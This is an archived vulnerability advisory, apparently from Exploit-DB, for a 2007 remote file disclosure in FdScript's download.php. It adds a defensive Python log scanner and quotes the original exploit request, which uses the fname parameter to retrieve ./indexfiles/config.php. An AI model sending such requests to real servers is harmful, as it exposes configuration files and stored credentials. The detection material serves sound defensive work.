vendor: FdScript
by: ajann
CVSS: 5.5 (MEDIUM)
CWE: Remote File Disclosure
Product Name: FdScript
Affected Version From: 1.3.2002
Affected Version To: 1.3.2002
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

FdScript <= v1.3.2 Remote File Disclosure Vulnerability

This vulnerability allows a remote attacker to read files on the target system. A crafted request to the download.php script that sets the fname parameter to a file path returns that file's contents, so sensitive files such as ./indexfiles/config.php can be retrieved.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to upgrade to a newer version of FdScript that does not have this vulnerability.
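
With no patch available, web server logs can be reviewed for requests that pass a path to fname. The Python below is an added example, not part of the original advisory or of FdScript. It assumes Apache combined log format and that legitimate downloads use a bare file name; the sample lines and the extension list are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed Apache combined-format lines (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [26/Jan/2007:10:01:02 +0000] "GET /fd/download.php?fname=manual.pdf HTTP/1.1" 200 48211 "-" "-"',
    '203.0.113.9 - - [26/Jan/2007:10:02:10 +0000] "GET /fd//download.php?fname=./indexfiles/config.php HTTP/1.1" 200 913 "-" "-"',
    '203.0.113.9 - - [26/Jan/2007:10:02:31 +0000] "GET //download.php?fname=.%252Findexfiles%252Fconfig.php HTTP/1.1" 200 913 "-" "-"',
    '198.51.100.7 - - [26/Jan/2007:10:03:00 +0000] "GET /fd/index.php?page=2 HTTP/1.1" 200 5120 "-" "-"',
]
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')
# Assumption: extensions that should never be served as downloads.
SCRIPT_EXTENSIONS = (".php", ".inc", ".phtml")

def normalise(value, rounds=3):
    """Percent-decode a bounded number of times so nested encoding cannot hide '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def classify_fname(fname):
    """Return the reasons a fname value deviates from a bare download name."""
    value, reasons = normalise(fname), []
    if "/" in value:
        reasons.append("path separator")
    if ".." in value.split("/"):
        reasons.append("parent directory")
    if value.lower().endswith(SCRIPT_EXTENSIONS):
        reasons.append("server-side source file")
    return reasons

def suspicious_download_requests(lines):
    """Return (client, decoded fname, HTTP status, reasons) for flagged requests."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        # Split by hand: urlsplit() reads a leading '//' as a host name.
        path, _, query = target.partition("?")
        if not path.lower().endswith("/download.php"):
            continue
        for fname in parse_qs(query).get("fname", []):
            reasons = classify_fname(fname)
            if reasons:
                hits.append((client, normalise(fname), int(status), reasons))
    return hits
```

A flagged request that returned status 200 is the one to triage first, since the file contents were likely served.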

Exploit-DB raw data:

*******************************************************************************
# Title   :  FdScript <= v1.3.2 Remote File Disclosure Vulnerability
# Author  :  ajann
# Contact :  :(
# Site    :  http://stud.usv.ro/~vlad_l/
# $$      :  Free

*******************************************************************************

[[SOURCE]]]---------------------------------------------------------

http://[target]/[path]//download.php?fname=[SOURCE FILE]

Example:

//download.php?fname=./indexfiles/config.php
[[/SOURCE]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-26]